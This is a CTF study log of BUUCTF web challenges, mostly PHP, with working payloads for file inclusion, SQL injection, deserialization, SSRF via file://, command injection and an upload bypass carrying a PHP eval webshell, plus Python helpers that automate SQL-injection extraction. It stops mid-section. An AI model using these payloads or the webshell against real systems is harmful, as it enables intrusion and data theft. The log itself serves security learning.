[toc]
0x01 Week

web

[极客大挑战 2019]Secret File

Follow the hints all the way to secr3t.php:
```php
<html>
    <title>secret</title>
    <meta charset="UTF-8">
<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file);
?>
</html>
```
PHP stream wrappers: the blacklist kills `../`, `tp` (so `http`/`ftp`), `input` (php://input) and `data`, but not `php://filter`, so flag.php can be pulled base64-encoded with `php://filter/convert.base64-encode/resource=flag.php` instead of being executed by include(). Decoded, flag.php is:
```php
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>FLAG</title>
</head>
<body style="background-color:black;"><br><br><br><br><br><br>
    <!-- "Aha! You found me! But you can't see me QAQ~~~" -->
    <h1 style="font-family:verdana;color:red;text-align:center;">啊哈!你找到我了!可是你看不到我QAQ~~~</h1><br><br><br>
    <p style="font-family:arial;color:red;font-size:20px;text-align:center;">
        <?php
            echo "我就在这里";   // "I'm right here"
            $flag = 'flag{51e7f07f-2e27-445a-ae66-4341c6252450}';
            $secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
        ?>
    </p>
</body>
</html>
```
[极客大挑战 2019]PHP

The hint says the source has leaked (a site backup), so scan for it:

```sh
python3 .\dirsearch.py -u "http://3fe07257-2515-4fc0-b3b6-dcd182c6742f.node3.buuoj.cn/" -e php --delay 1
```

Note: hammering the target gets you HTTP 429 (too many requests), hence the --delay.
```
└─[极客大挑战 2019]PHP1
  └─www
      class.php
      flag.php
      index.js
      index.php
      style.css
```

index.php:

```php
<?php
include 'class.php';
$select = $_GET['select'];
$res = unserialize(@$select);
?>
```

class.php:

```php
<?php
include 'flag.php';
error_reporting(0);
class Name {
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username, $password) {
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup() {
        $this->username = 'guest';
    }

    function __destruct() {
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username; echo "</br>";
            echo "You password is: ";
            echo $this->password; echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        } else {
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>
```
Key point: bypassing __wakeup().

When the property count in the serialized string is larger than the real number of properties, PHP skips __wakeup() (CVE-2016-7124, fixed in PHP 5.6.25 and 7.0.10). Here __wakeup() would reset username to guest, so it must be skipped; the destructor then needs password loosely equal to 100 (`!= 100`) and username strictly equal to 'admin'. Generate the string with the real class layout first:

```php
<?php
error_reporting(0);
class Name {
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct() {
        $this->username = 'admin';
        $this->password = 100;
    }
}
$a = new Name();
$aa = serialize($a);
echo $aa;
```

Then bump the property count from 2 to 3. Private property names are serialized as `\0Name\0username`, so the NUL bytes must be sent URL-encoded as %00:

```
O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
```
[极客大挑战 2019]LoveSQL

This challenge hammered home for me that sometimes it's not that the payload doesn't work, you just forgot to URL-encode it...

Error-based injection
```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select )))%23&password=1
```

XPATH syntax error: ' geek'

The current database is geek. Its tables:

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select group_concat(table_name) from information_schema.tables where table_schema='geek')))%23&password=1
```

XPATH syntax error: ' geekuser,l0ve1ysq1'

Columns of geekuser (extractvalue() only echoes the first 32 characters of the expression, hence the mid()):

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' and extractvalue(0x0a,concat(0x0a,(select mid(group_concat(column_name),1,32) from information_schema.columns where table_schema='geek' and table_name='geekuser')))%23&password=1
```

XPATH syntax error: ' id,username,password'

updatexml() works the same way:

```
and updatexml(1,concat(0x7e,(select group_concat(username) from geek.geekuser),0x7e),1) --+
and updatexml(1,concat(0x7e,(select mid(group_concat(password),25,40) from geek.geekuser),0x7e),1) %23&password=1
```

Result:

```
username=admin&password=d5e5cfb07c326d6707635db2357de47
```

...which was no use at all. Tried another approach and found that a plain UNION SELECT works here (ugh). Query the l0ve1ysq1 table directly:

```
http://3df9e86d-2e57-439e-a346-f35bc5c07147.node3.buuoj.cn/check.php?username=1' union select 1,2,group_concat(password) from geek.l0ve1ysq1%23&password=1
```

The flag is at the end of the concatenated password column.
[极客大挑战 2019]Knife

Connect straight away with a webshell client; the flag is in /flag.

0x02 Week

I want to reproduce challenges from recent competitions.
web

[网鼎杯 2018]Fakebook

The injection point is:

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1
```

Fuzzing shows the error-reporting functions are still usable:
```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(schema_name) from information_schema.schemata),1,32),'~')))
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(schema_name) from information_schema.schemata),32,64),'~')))
```

(mid(str, 32, 64) means "start at position 32, take 64 characters"; only 31 of them fit in the error next to the marker, so the second probe re-reads position 32 and windows of mid(str,1,31), mid(str,32,31), ... would avoid the overlap.)

result:

```
fakebook,information_schema,mysql,performance_schema,test
```

Current database:

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,64),'~')))
[*] query error ! (XPATH syntax error: '~users~')

http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,64),'~')))
[*] query error ! (XPATH syntax error: '~no,username,passwd,data~')

http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(no) from users),1,64),'~')))
[*] query error ! (XPATH syntax error: '~1,2,3,4,5~')

http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=1 and (extractvalue(1, concat('~',mid((select group_concat(data) from users),49,1000),'~')))
O:8:"UserInfo":3:{s:4:"name";s:2:"11";s:3:"age";i:11;s:4:"blog";s:12:"http://1.com";},O:8:"UserInfo":3:{s:4:"name";s:3:"111....
```
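Both LoveSQL and Fakebook run into the same limit: a MySQL XPATH syntax error echoes only the first 32 characters of the offending expression, so each request returns the marker plus 31 characters of data, and a second probe of mid(..., 32, 64) simply re-reads position 32. The following is an added example, not part of the original writeup, that generates non-overlapping mid() windows for any subquery and reassembles the value from the error strings. The subquery `select secret from t`, the secret and the `simulate_*` helpers are constructed stand-ins for a real database so the round trip can be checked offline; against a target you would send each payload and feed the error text of the response to reassemble().

```python
import re

ERROR_WINDOW = 32   # characters MySQL echoes in "XPATH syntax error: '...'"
MARKER = "~"        # leading marker so that leading spaces/digits are not lost
XPATH_ERR = re.compile(r"XPATH syntax error: '(.*)'", re.S)
MID_RE = re.compile(r"mid\(\((.*)\),(\d+),(\d+)\)\)\)$")


def length_payload(subquery, marker=MARKER):
    """First request: how long is the value? Tells the loop below when to stop."""
    return f"and extractvalue(1,concat('{marker}',(select length(({subquery})))))"


def chunk_payloads(subquery, total_len, marker=MARKER):
    """Non-overlapping mid() windows covering total_len characters.
    mid() is 1-indexed; the marker uses one of the 32 echoed characters."""
    width = ERROR_WINDOW - len(marker)
    return [
        f"and extractvalue(1,concat('{marker}',mid(({subquery}),{start},{width})))"
        for start in range(1, total_len + 1, width)
    ]


def reassemble(error_messages, marker=MARKER):
    """Strip the marker from each XPATH error and join the pieces in request order."""
    pieces = []
    for msg in error_messages:
        m = XPATH_ERR.search(msg)
        if not m or not m.group(1).startswith(marker):
            raise ValueError(f"unexpected error text: {msg!r}")
        pieces.append(m.group(1)[len(marker):])
    return "".join(pieces)


# ---- offline stand-in for the database, constructed for this example -------------
def simulate_mysql_error(xpath_expr):
    """MySQL only echoes the first 32 characters of the bad XPath expression."""
    return f"XPATH syntax error: '{xpath_expr[:ERROR_WINDOW]}'"


def simulate_server(payload, secret, marker=MARKER):
    """Pretend the subquery evaluates to `secret`; answer the payload as MySQL would."""
    m = MID_RE.search(payload)
    if not m:
        raise ValueError("payload is not a mid() window")
    start, width = int(m.group(2)), int(m.group(3))
    return simulate_mysql_error(marker + secret[start - 1:start - 1 + width])


def extract(secret, marker=MARKER):
    """Round trip: generate windows for the secret's length, answer them, reassemble."""
    payloads = chunk_payloads("select secret from t", len(secret), marker)
    errors = [simulate_server(p, secret, marker) for p in payloads]
    return payloads, reassemble(errors, marker)
```

updatexml(1, concat(...), 1) can be substituted for extractvalue() without changing the windowing; the 32-character limit is the same.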
A directory scan turns up a backup file: /user.php.bak

```php
<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }

    public function getBlogContents()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }
}
```

Use file:// together with the serialized object to read a file: the data column holds a serialized UserInfo and its blog URL is fetched with curl, which accepts any scheme. The isValidBlog() regex would reject file:// on input, but a row injected through the UNION never passes through it, so the server reads flag.php for you:

```
http://f96cd01a-4f46-4960-84fd-52bf8595d3f8.node3.buuoj.cn/view.php?no=0/**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:5:"fe1w0";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#
```

(/**/ stands in for spaces; no=0 makes the real row empty so the UNION row is the one rendered.)
[极客大挑战 2019]Http

The page checks the Referer, the browser named in User-Agent and the client address in turn; one request satisfying all three:

```
GET /Secret.php HTTP/1.1
Host: node3.buuoj.cn:26240
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Syclover/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: image/webp,image/apng,image/*,*/*;q=0.8
Referer: https://www.Sycsecret.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
X-Forwarded-For: 127.0.0.1
```
[GXYCTF2019]Ping Ping Ping

Obvious command execution. References:

https://blog.csdn.net/miuzzx/article/details/104617234
https://www.cnblogs.com/wangtanzhi/p/12246386.html

I'll organise my notes on command execution when I have time.
[ACTF2020 新生赛]Include

```php
<meta charset="utf8">
<?php
error_reporting(0);
$file = $_GET["file"];
if(stristr($file,"php://input") || stristr($file,"zip://") || stristr($file,"phar://") || stristr($file,"data:")){
    exit('hacker!');
}
if($file){
    include($file);
}else{
    echo '<a href="?file=flag.php">tips</a>';
}
?>
```

php://filter is not on the blacklist, so read flag.php base64-encoded instead of letting include() execute it:

```
http://f9a66afc-c568-41e2-8e62-6dc3fc6eef68.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php
```
[极客大挑战 2019]BabySQL

Manual testing shows select, union, or, and, if, mid are filtered, but each word is only stripped once, so doubling them works:

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' oorr 1=1--+
```

login success

```
6624c656c910f997ad9393630d1aca7d
```

The doubling also applies to keywords hidden inside identifiers, which is why information_schema becomes infoorrmation_schema:

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(schema_name) frofromm infoorrmation_schema.schemata %23
```

Your password is 'information_schema,mysql,performance_schema,test,ctf,geek'

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(table_name) frofromm infoorrmation_schema.tables whwhereere table_schema='ctf' %23
```

Your password is 'Flag'

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(column_name) frofromm infoorrmation_schema.columns whwhereere table_schema='ctf' anandd table_name='Flag'%23
```

Your password is 'flag'

```
http://9c72648c-c3c7-4675-8282-29a83a14a1e0.node3.buuoj.cn/check.php?username=admin&password=' uniunionon seselectlect 1,2, group_concat(flag) frofromm ctf.Flag %23
```
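The filter behind BabySQL behaves like a single pass of str_replace(): every blacklisted word is deleted once and the result is not re-scanned, which is why `oorr` collapses to `or`. The added example below (not from the original page) reproduces that behaviour in Python and derives the doubled payload mechanically from the clean query, so you can verify before sending that the mangled string survives the filter intact, including the `or` hidden inside `information_schema`. The blacklist is the one observed in this challenge; the sequential, case-sensitive str_replace() model of the server is an assumption made for the offline test.

```python
# Blacklist observed by hand in BabySQL; the order is the order the filter applies them in
BLACKLIST = ["select", "union", "or", "and", "if", "mid", "from", "where"]

# The payload used above to list the columns of ctf.Flag (clean form)
PAYLOAD = ("' union select 1,2,group_concat(column_name) from information_schema.columns "
           "where table_schema='ctf' and table_name='Flag'#")


def vulnerable_filter(query, blacklist=BLACKLIST):
    """Stand-in for the server side str_replace($blacklist, '', $query):
    each word is removed in one left-to-right pass, with no re-scan afterwards.
    Python's str.replace() has exactly those non-overlapping, single-pass semantics."""
    for word in blacklist:
        query = query.replace(word, "")
    return query


def double_write(query, blacklist=BLACKLIST):
    """Split every blacklisted word in half and put a full copy in the middle
    (or -> oorr, select -> selselectect). The filter deletes the inner copy, and
    the two halves close up into the original word. Identifiers are rewritten too,
    so information_schema becomes infoorrmation_schema as in the payloads above."""
    for word in blacklist:
        half = len(word) // 2
        query = query.replace(word, word[:half] + word + word[half:])
    return query


def survives_filter(query, blacklist=BLACKLIST):
    """True when the doubled form collapses back to exactly the intended query."""
    return vulnerable_filter(double_write(query, blacklist), blacklist) == query
```

Check survives_filter() for every new query before sending it: doubling one word can, with an unlucky blacklist, create an occurrence of another word that the filter then removes, and this is the cheap way to notice.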
[极客大挑战 2019]BuyFlag

The page source of pay.php contains the check as an HTML comment:

```php
<!--
    ~~~post money and password~~~
if (isset($_POST['password'])) {
    $password = $_POST['password'];
    if (is_numeric($password)) {
        echo "password can't be number</br>";
    }elseif ($password == 404) {
        echo "Password Right!</br>";
    }
}
-->
```

```
POST /pay.php HTTP/1.1
Host: f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn
Content-Length: 26
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://f2b98c43-44a6-4bf9-99f6-f3d7d8741277.node3.buuoj.cn/pay.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: user=1
Connection: close

password=404a&money=1e99
```

Just follow the hints. password=404a fails is_numeric() yet satisfies 404a == 404 under PHP 7's loose comparison, which uses the leading digits of the string (PHP 8 compares an int against a non-numeric string as strings, so this trick dies there). money=1e99 is a short string that evaluates to a huge number; note the Cookie: user=1 in the request as well.
[ACTF2020 新生赛]Exec

Simpler than Ping Ping Ping: the input goes to the shell unfiltered, so a pipe is enough.

```sh
123|find / -name flag    # -name takes a basename pattern, not a path
123|cat /flag
```
[ZJCTF 2019]NiZhuanSiWei

```php
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit();
    }else{
        include($file);
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>
```

😒 The HackBar on Edge is sometimes unreliable; the Firefox HackBar add-on is more accurate.

text=php://input makes file_get_contents() read the POST body, which is how the fixed string gets in:

```
http://3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn/index.php?text=php://input&file=file:///etc/passwd
[POST body]
welcome to the zjctf
```

Following the hint, read useless.php:

```php
<?php
class Flag{
    public $file;
    public function __tostring(){
        if(isset($this->file)){
            echo file_get_contents($this->file);
            echo "<br>";
            return ("U R SO CLOSE !///COME ON PLZ");
        }
    }
}
?>
```

payload: include useless.php so that class Flag exists, then unserialize a Flag whose file is flag.php; `echo $password` triggers __tostring(), which reads the file:

```
POST /index.php?text=php://input&file=useless.php&password=O:4:%22Flag%22:1:{s:4:%22file%22;s:8:%22flag.php%22;} HTTP/1.1
Host: 3eacb34b-c73c-4205-8cbe-1a2574bb0970.node3.buuoj.cn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 20

welcome to the zjctf
```
[极客大挑战 2019]Upload

A .phtml extension, a GIF89a magic header for the content check, and `<script language="php">` in place of `<?php`:

```
POST /upload_file.php HTTP/1.1
Host: 86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn
Content-Length: 340
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZjya86HWY0DubZE0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4133.0 Safari/537.36 Edg/84.0.508.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://86a79073-8e5d-4ffd-ad05-4fbf0d48b12e.node3.buuoj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

------WebKitFormBoundaryZjya86HWY0DubZE0
Content-Disposition: form-data; name="file"; filename="cc.phtml"
Content-Type: image/gif

GIF89a?
<script language="php">eval($_REQUEST['f'])</script>
------WebKitFormBoundaryZjya86HWY0DubZE0
Content-Disposition: form-data; name="submit"

提交
------WebKitFormBoundaryZjya86HWY0DubZE0--
```

Caveat: the `<script language="php">` long-form tag was removed in PHP 7.0, so this shell only runs on a PHP 5 target. Then connect with AntSword.
[RoarCTF 2019]Easy Java

u1s1, I don't know Java; I'll look at it during class tomorrow.

WEB-INF/web.xml leak

WEB-INF mainly contains the following files and directories:

- /WEB-INF/web.xml: the web application's configuration file; it describes the servlets and other application components, their configuration and naming rules.
- /WEB-INF/classes/: all the site's .class files, servlet and non-servlet alike, that are not packaged into a .jar.
- /WEB-INF/lib/: the JAR files this application needs and that are used only by it, e.g. the database driver.
- /WEB-INF/src/: source directory, .java files laid out by package.
- /WEB-INF/database.properties: database configuration file.

Detection and exploitation: find web.xml, infer the paths of the class files from it, download the .class files directly, decompile them, and you have the site's source.

Root cause:

Web applications are commonly deployed behind several web servers working together, to compensate for one server's performance weaknesses, to load-balance, and to implement layered security policies. In such a setup a misconfigured mapping of static directories or files can make web.xml and friends readable. Servlet containers forbid access to WEB-INF by default, but when Nginx is put in front of Tomcat for load balancing or clustering, Nginx knows nothing about JSP-engine rules (it is not a JSP engine, and importing another engine's security rules into its own would couple them far too tightly), so WEB-INF has to be denied in the Nginx configuration explicitly:

```nginx
location ~ ^/WEB-INF/* { deny all; }
```

or return 404, or whatever you prefer. (The trailing * only quantifies the slash; `^/WEB-INF/` is the cleaner pattern.)

Downloading web.xml works with a POST:

```
POST /Download?filename=/WEB-INF/web.xml
```

```xml
<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <welcome-file-list>
        <welcome-file>Index</welcome-file>
    </welcome-file-list>

    <servlet>
        <servlet-name>IndexController</servlet-name>
        <servlet-class>com.wm.ctf.IndexController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>IndexController</servlet-name>
        <url-pattern>/Index</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>LoginController</servlet-name>
        <servlet-class>com.wm.ctf.LoginController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>LoginController</servlet-name>
        <url-pattern>/Login</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>DownloadController</servlet-name>
        <servlet-class>com.wm.ctf.DownloadController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>DownloadController</servlet-name>
        <url-pattern>/Download</url-pattern>
    </servlet-mapping>

    <servlet>
        <servlet-name>FlagController</servlet-name>
        <servlet-class>com.wm.ctf.FlagController</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>FlagController</servlet-name>
        <url-pattern>/Flag</url-pattern>
    </servlet-mapping>
</web-app>
```

Each servlet-class maps to a file under /WEB-INF/classes/, so FlagController is at:

```
http://90e20284-6ad5-42e6-8e86-87aa6a2d443a.node3.buuoj.cn/Download?filename=/WEB-INF/classes/com/wm/ctf/FlagController.class
```

The class carries the flag as a base64 string; decode it.
[BJDCTF2020]Easy MD5
https://blog.csdn.net/qq_19980431/article/details/83018232
https://blog.csdn.net/March97/article/details/81222922
http://cvk.posthaven.com/sql-injection-with-raw-md5-hashes
0x01 Check the response headers

The hint header gives the query `select * from 'admin' where password=md5($pass,true)`. md5() takes:

| Parameter | Description |
| --- | --- |
| string | Required. The string to hash. |
| raw | Optional. Default FALSE: return a 32-character hex string. TRUE: return the 16-byte raw binary digest. |

Principle: with md5($pass, true) the raw 16 bytes are concatenated straight into the SQL string. If they start with `'or'` followed by something MySQL coerces to a non-zero number, the WHERE clause becomes `password='' or '6...'`, which is true for every row. The classic input is ffifdyop:

```
content: ffifdyop
hex:     276f722736c95d99e921722cf9ed621c
raw:     'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c
string:  'or'6]!r,b
```

The query after concatenation:

```sql
select * from 'admin' where password='' or '6]!r,b';
select * from 'admin' where password='' or '6xxxx';
```

Logging in hands over the next level:

```html
<script>window.location.replace('./levels91.php')</script>
```

0x02 Source code

PHP weak typing: the two hashes are compared with ==. Both hashes below have the form 0e followed only by digits, so PHP parses them as numeric strings equal to 0 and the comparison is true:

```
a=s1836677006a&b=s1885207154a
```

0x03

```php
<?php
error_reporting(0);
include "flag.php";

highlight_file(__FILE__);

if($_POST['param1']!==$_POST['param2']&&md5($_POST['param1'])===md5($_POST['param2'])){
    echo $flag;
}
```

Here the comparison is strict, but the inputs are not type-checked: md5() returns NULL (with a warning) for an array argument in PHP 5/7, so two different arrays satisfy both conditions (PHP 8 throws a TypeError instead).
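Added example (not from the original post) that checks the three MD5 tricks above from Python instead of by hand: the raw-digest injection behind ffifdyop, the 0e "magic hash" pair used on level two, and the array trick for the strict comparison on level three. The coercion helpers are simplified models of MySQL's and PHP's behaviour written for this example, enough to show why each input works; they are not the engines' own code.

```python
import hashlib
import re


def raw_md5(s: str) -> bytes:
    return hashlib.md5(s.encode("latin-1")).digest()


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode("latin-1")).hexdigest()


def mysql_numeric_prefix(s: bytes) -> float:
    """Model of MySQL string->number coercion: the leading decimal number, else 0.
    '6\\xc9]...' becomes 6.0, so  '' OR '6\\xc9]...'  is true."""
    m = re.match(rb"\s*[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?", s)
    return float(m.group(0).decode("latin-1")) if m else 0.0


def raw_md5_injects(s: str) -> bool:
    """True when md5($s, true) turns  password='<digest>'  into  password='' or '<n>...'
    with <n> a non-zero number, i.e. the WHERE clause matches every row."""
    d = raw_md5(s)
    return d.startswith(b"'or'") and mysql_numeric_prefix(d[4:]) != 0


def is_php_magic_hash(hexdigest: str) -> bool:
    """'0e' followed by digits only: a numeric string PHP's == parses as 0e123... == 0.0.
    Any hex letter after the 0e breaks the numeric form, so most digests do not qualify."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def php_loose_md5_equal(a: str, b: str) -> bool:
    """Model of md5($a) == md5($b): two numeric strings compare as numbers (PHP 5/7/8)."""
    ha, hb = md5_hex(a), md5_hex(b)
    if is_php_magic_hash(ha) and is_php_magic_hash(hb):
        return True          # both parse to 0.0
    return ha == hb


def php_strict_md5_bypass(p1, p2) -> bool:
    """Level 3: param1 !== param2 && md5(param1) === md5(param2).
    PHP 5/7: md5() of an array returns NULL (with a warning), so two different
    arrays give NULL === NULL. Modelled here as: non-string input -> None."""
    def php_md5(v):
        return md5_hex(v) if isinstance(v, str) else None
    return p1 != p2 and php_md5(p1) == php_md5(p2)
```

The magic-hash check is the one to reuse: run it over md5 of candidate strings and you get your own 0e pairs instead of copying them from a list.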
[ACTF2020 新生赛]BackupFile

Source file:

```php
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {
        exit("Just num!");
    }
    $key = intval($key);
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}
```

```
http://19f24e41-44d2-46bc-9763-1f20eeeda2f9.node3.buuoj.cn/?key=123
```

Loose comparison again: in PHP 7, 123 == "123ffw..." is true because the string's leading digits are used (in PHP 8 an int against a non-numeric string is compared as strings, so this no longer works). ...Not much to it.

Source of the nmap sandbox challenge (the escapeshellarg()/escapeshellcmd() analysis is in week 0x04):

```php
<?php
if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}
```
0x03 Week

Time to go over what I couldn't do at 网鼎杯 and learn, learn, learn.

web

[网鼎杯 2020 青龙组]AreUSerialz

```php
<?php
include("flag.php");
highlight_file(__FILE__);

class FileHandler {
    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }
}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}
```

The crux of this one is knowing that since PHP 7.1 unserialize() no longer checks property visibility: a property serialized as public (`s:2:"op"`) is assigned to the protected $op. That is what gets a payload past is_valid(), which rejects the NUL bytes of the `\0*\0` prefix a protected property would otherwise need (Knight worked this out from the PHP source after the contest, Orz). Two more details in the source: op must be the integer 2, because __destruct() flips op back to "1" (write mode) only when op === "2" strictly, while process() accepts 2 == "2" loosely; and `~` (126) is also outside is_valid()'s range, so paths may not contain it.

Reading files:

```
